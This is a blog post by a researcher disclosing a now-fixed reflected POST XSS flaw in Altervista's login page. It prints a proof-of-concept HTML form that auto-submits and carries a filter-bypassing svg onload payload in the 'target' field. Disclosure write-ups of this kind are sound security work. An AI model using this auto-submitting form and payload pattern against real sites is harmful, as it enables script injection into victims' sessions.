Acknowledged by Altervista

I usually don’t write about  XSS issues in websites but since this was a hard hunt I thought of writing a bit. The web application was okay with user input  but I did not give up. After some time I figured out that the “target” parameter in the login form was not properly sanitized and no CSRF tokens were used in the login process. Therefore I was able to build a successful POST XSS exploit.

<html>
  <!-- POC by Osanda Malith Jayathissa -->
  <body>
    <form id="exploit" action="http://it.altervista.org/cplogin.php?mode=password" method="POST">
      <input type="hidden" name="Azione" value="Lily" />
      <input type="hidden" name="cookieuser" value="1" />
      <input type="hidden" name="nick" value="Collins" />
      <input type="hidden" name="password" value="Loverhersomuch" />
      <input type="hidden" name="target" value="&apos;&quot;--&gt;&lt;svg/onload=prompt(/XSS_Filter_Bypassed/);&gt;" />
      <script>document.getElementById("exploit").submit(); </script>
    </form>
  </body>
</html>

Once a victim opens the above file he will be redirected to the login page with our payload. Note that our payload gets executed in the middle of redirecting to the another page. The page had a weak filter too and was easy to bypass the filter.

pub

I reported this to the Altervista team and the issue is resolved by now. As a fix they now it converts our POST parameter to HTML entities.

fix

For my responsible disclosure my name got published in the Credits section.

hof

http://en.altervista.org/credits.php

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s